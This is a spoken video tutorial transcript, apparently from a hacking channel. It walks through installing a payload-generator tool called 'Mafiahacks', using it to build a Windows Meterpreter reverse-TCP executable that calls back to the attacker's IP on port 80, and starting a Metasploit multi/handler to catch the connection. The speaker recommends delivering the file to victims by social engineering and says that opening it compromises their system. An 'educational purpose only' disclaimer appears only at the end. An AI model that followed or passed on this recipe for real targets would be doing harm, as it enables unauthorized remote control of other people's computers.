Okay, so hello guys, so you're welcome to today's training, and today we want to be looking at how to use Mafiahacks to create a payload. Yes, we want to create a payload using a Mafiahack tool. Now here is it. Let me open my system. Okay, you can see that you can go to this website. This is the word Mafiahack, and the purpose of this tool is to automate the payload creation process. You can create a payload for all type of OS in a second. Okay, this is the Mafia tool, and this is the code. This is the code which will be cloning in our terminal. This is the Mafia tool. You can use to create Linux payload, Windows, macOS, Android, Apple OS, and what have you. So this is the installation process. This is the git clone, the code. Then this is the usage, and we should note that what Android payload extension is target.apk, Windows payload extension target.exl, Linux payload extension dash, and what have you. These are the features of this Mafiahacks tool. So we'll go to our terminal. Before you do anything, make sure you update your system. Enter my password. Okay, enter the wrong one. Okay, so you give it time for your system to update itself. Okay, so after updating, just have to be on my desktop, CD desktop. Let me I want to install this Mafiahacks tool on my desktop. Now the next thing for us to do, just go to that site and copy the code. Copy the code here, copy, then go back to your terminal, just your git clone, then paste the code. Then take your enter. Okay, let's try it again. Git clone. Then let me paste it. So you give it time for it to clone. It's cloning now. This is done. That's finished cloning. I do my LX, so I can see my Mafia tool in my desktop. If you look at my desktop here, you can see this Mafiahacks. Okay, so the next thing for us to do is to do our sudo chomp the mafia.sh. Oh, okay. Let me do something first. So let me enter into the Mafiahacks first. Then my CD Mafiahacks. So I'm already inside the Mafiahacks, so I'll do my LX. Good. So this is what I want to install now, the XH. Okay, let me paste it. That is sudo chom Mafiahacks. Then take my enter. Okay, so the next thing, let me do my LX. Let me do my LX. So I have it, so let me install it again. You now see that it's showing green. Okay, you see that it's showing green. Unlike before, this one is not showing green. Now it's not showing green. That is more reason I have to do my LX again and make sure yours is showing green. Now I install it again, take my enter. Okay guys, so I take my sudo bash mafia.sh. Okay, There is the installation. Now take my enter. Now you can see this what our Mafiahack. You can see they say what choose OS type for payload correction, Linux, Windows, macOS, Android, Apple OS, and our exit. Now let's say okay, we want to take number 1 or want to take number 2. Let's say we want to target a Windows machine. This is 2. Select 2. Then you choose payload creation option. We have Windows Metapreter reverse TCP, Windows Metapreter reverse HTTPS, Windows Metapreter Ben TCP, Windows Share reverse TCP, and Windows Share B TCP. So you choose which you want to use. So I will be going for my Windows Metapreter reverse TCP. That is 1. Take my enter. Now they now tell us what the next thing for us to do. We have to create our L host. Okay guys, we have to create our L host. So we have to create our L host, and to put down our L host, we have to use the IP of our Kali machine. So open our terminal, then we'll do what our if config. So get the IP. So this is the IP of our terminal 192. This is our IP of our Kali. So just copy the IP, then you paste it here. So that is the IP. You go. So you have copied your IP. You just take your enter. Then we have to put our L ports. Take your L port to be 80. Then take your enter. They say enter name of payload, e.g. target. So enter target.exe. Okay, take our enter. Now he's generating your Windows payload. Okay guys, you just wait for it to generate your Windows payload for you, and this Windows payload can be used to send to any target, and once that target open the payload, you are automatically access the system of such individuals. Okay. Okay, let's open another terminal. Let's see. Then let me do my LX. Okay, it's still generating the payload. That's why it's not showing yet. So just wait for it to generate. Okay, so guys, you can see no platform was selected. Choose okay. Let's see. Windows payload save as target. So you can see that our Windows payload have been saved. So let's open that same within terminal and do our LX if the Windows payload is actually there. Okay. Then let's do our LX. Okay. Let's see what's going on. It's already saved. Okay. Okay, so let me open the terminal and go to my desktop. So I'll have to go towards my Mafia. Remember, I was on Mafia before I install. So go to CD, Mafiahacks. Now do my LX. So we can see the target exe here. So our payload have been created. Okay, so our payload have been created. So the next thing for us to do now, guys, is you have to we need to set the listener using Metasploit. We have to create a listener to create our Metasploit. So we have to do our MSF console. So just follow the step which I'm following, which I'm doing, and you will get the exact thing to do, guys. So let's wait for our MSF console to integrate itself. Okay, now we are in the MSF console. Now we have to use what? Use exploits / multi-handler. Okay, fail to load model. Let me see. Okay, let's use our exploits / multi-handler. Okay, so we are now multi-handler. So we have to set our payload. Set payload. Set payload / window. Windows / metaprinter. /metaprinter / reverse _ TCP. Take our enter. Okay, let's set payload Windows / metaprinter / reverse _ TCP. Okay, let's see. It's not valid. Let's see. Okay, my window is .I, which is wrong. Okay, let me correct this. Let me just copy and paste it, then correct my windows. Interpreter reverse TCP. Okay, let's see. It's not valid too. Oh, okay guys, so the problem has been detected, so we'll just have to do it again. Set payload Windows / metaprinter / reverse _ TCP. Enter. Okay, so payload Windows has been set. So the next thing for us to do, we have to set our L host. Okay, our L host. Set L host. We have to take the IP of our Kali. We will take the IP of our Kali, this very IP which we used before. Copy, paste it. Then we set our what? Set L ports. Remember our L port is 80. Enter. So we'll do exploits. We'll exploit what we have done. You can know that these payloads can be sent in diverse ways, either using social engineering or using this MSF console to create a payload to the target. Okay guys, so this is how to create a payload, and once you are creating a payload, you send it to the target. Remember I said that this payload can be sent in two ways, either using social engineering to send the file which you have created, or you use your MSF console to create the verify. Okay, this verify, this is our target.exe. This is the payload. Okay, you can use social engineering to send this verify and your target once they open it. so everything will be compromised. Or you can use MSF console to send the target's file to their system. Okay guys, so thank you for staying tuned. Please, if you find this training interesting, please do well to subscribe to our channel, share this, like and comment. I will reply to your comments. Thank you for staying tuned. Please remember, this is for educational purpose only. Please do not do this, neither do you try it for whatsoever system you're not giving an authorization to do. Where you're not giving permission to do this, please do not do that. Do not send a compromised file to a system which you don't know. Please, this training is for educational purpose only. Thank you guys for staying.